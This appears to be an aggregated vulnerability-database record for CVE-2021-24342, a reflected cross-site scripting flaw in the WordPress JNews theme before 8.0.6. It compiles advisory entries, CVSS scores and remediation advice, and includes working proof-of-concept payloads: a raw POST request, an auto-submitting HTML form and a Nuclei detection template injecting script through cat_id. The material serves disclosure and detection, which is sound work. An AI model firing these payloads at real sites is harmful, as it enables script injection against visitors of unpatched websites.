Description
The theme did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.
Related
{"id": "WPEX-ID:415CA763-FE65-48CB-ACD3-B375A400217E", "type": "wpexploit", "bulletinFamily": "exploit", "title": "JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)", "description": "The theme did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.\n", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T07:02:58", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "", "reporter": "Truoc Phan", "references": [], "cvelist": ["CVE-2021-24342"], "immutableFields": [], "lastseen": "2021-09-14T23:11:59", "viewCount": 148, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24342"]}, {"type": "patchstack", "idList": ["PATCHSTACK:048FB6A9AD6E12EDBDA8B71AA7323CE3"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:415CA763-FE65-48CB-ACD3-B375A400217E"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24342"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:415CA763-FE65-48CB-ACD3-B375A400217E"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-24342", "epss": "0.001020000", "percentile": "0.400730000", "modified": "2023-03-17"}], "vulnersScore": 0.2}, "sourceData": "POST /?ajax-request=jnews HTTP/1.1\r\nAccept: text/html, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 130\r\nConnection: close\r\n\r\nlang=en_US&cat_id=6\"><svg/onload=alert(/XSS/)>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\r\n\r\n\r\n<html>\r\n <body>\r\n <form action=\"https://example.com/?ajax-request=jnews\" method=\"POST\">\r\n <input type=\"hidden\" name=\"lang\" value=\"en_US\" />\r\n <input type=\"hidden\" name=\"cat_id\" value=\"6"><svg/onload=alert(/XSS/)>\" />\r\n <input type=\"hidden\" name=\"action\" value=\"jnews_build_mega_category_2\" />\r\n <input type=\"hidden\" name=\"number\" value=\"6\" />\r\n <input type=\"hidden\" name=\"tags\" value=\"70,64,10,67\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n", "generation": 0, "_state": {"dependencies": 1660004461, "score": 1698842189, "epss": 1679073339}, "_internal": {"score_hash": "e90c44d1dd8704f47770fd1cee46b675"}}
{"nuclei": [{"lastseen": "2023-12-05T08:47:48", "description": "WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-09-15T00:00:00", "type": "nuclei", "title": "WordPress JNews Theme <8.0.6 - Cross-Site Scripting", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24342"], "modified": "2023-11-27T00:00:00", "id": "NUCLEI:CVE-2021-24342", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2021/CVE-2021-24342.yaml", "sourceData": "id: CVE-2021-24342\n\ninfo:\n name: WordPress JNews Theme <8.0.6 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*).\n remediation: |\n Update to the latest version of the WordPress JNews Theme (>=8.0.6) to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24342\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24342\n cwe-id: CWE-79\n epss-score: 0.00102\n epss-percentile: 0.41374\n cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: jnews\n product: jnews\n framework: wordpress\n tags: cve2021,wordpress,xss,wp-plugin,wpscan,cve\n\nhttp:\n - raw:\n - |\n POST /?ajax-request=jnews HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n lang=en_US&cat_id=6\"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '</script><script>alert(document.domain)</script>'\n\n - type: word\n part: header\n words:\n - 'Content-Type: text/html'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ca9c3f5478cef6ae3d35ac3079050a5fecc23328373f06b680b40d9eb37305330220363c85b528b8e6c4265cf62264775efb104aeb923d7dcdd926da8f2ac243ff3c:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:32:13", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by Truoc Phan in WordPress JNews premium theme (versions <= 8.0.5).\n\n## Solution\n\n\r\n Update the WordPress JNews premium theme to the latest available version (at least 8.0.6).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-05-24T00:00:00", "type": "patchstack", "title": "WordPress JNews premium theme <= 8.0.5 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24342"], "modified": "2021-05-24T00:00:00", "id": "PATCHSTACK:048FB6A9AD6E12EDBDA8B71AA7323CE3", "href": "https://patchstack.com/database/vulnerability/jnews/wordpress-jnews-premium-theme-8-0-5-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "prion": [{"lastseen": "2023-11-22T00:39:39", "description": "The JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-07T11:15:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24342"], "modified": "2021-06-10T23:59:00", "id": "PRION:CVE-2021-24342", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-24342", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-09-14T23:11:59", "description": "The theme did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.\n\n### PoC\n\nPOST /?ajax-request=jnews HTTP/1.1 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 130 Connection: close lang=en_US&cat;_id=6\">&action;=jnews_build_mega_category_2&number;=6&tags;=70%2C64%2C10%2C67 \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-24T00:00:00", "type": "wpvulndb", "title": "JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24342"], "modified": "2021-05-24T07:02:58", "id": "WPVDB-ID:415CA763-FE65-48CB-ACD3-B375A400217E", "href": "https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cnvd": [{"lastseen": "2022-11-05T10:45:53", "description": "WordPress is the Wordpress Foundation's set of blogging platforms developed using the PHP language. The platform supports setting up personal blogging sites on servers with PHP and MySQL. WordPress plugin is a WordPress open source application plugin. cross-site scripting vulnerability exists in versions prior to JNews WordPress theme 8.0.6. The vulnerability stems from the program not cleaning up the cat_id parameter in POST requests, and an attacker could The vulnerability can be exploited to cause XSS attacks.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-24T00:00:00", "type": "cnvd", "title": "WordPress Plugin Cross-Site Scripting Vulnerability (CNVD-2021-59603)", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24342"], "modified": "2021-08-09T00:00:00", "id": "CNVD-2021-59603", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-59603", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2023-12-03T14:47:02", "description": "The JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-07T11:15:00", "type": "cve", "title": "CVE-2021-24342", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24342"], "modified": "2021-06-10T23:59:00", "cpe": [], "id": "CVE-2021-24342", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24342", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}]}
JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)
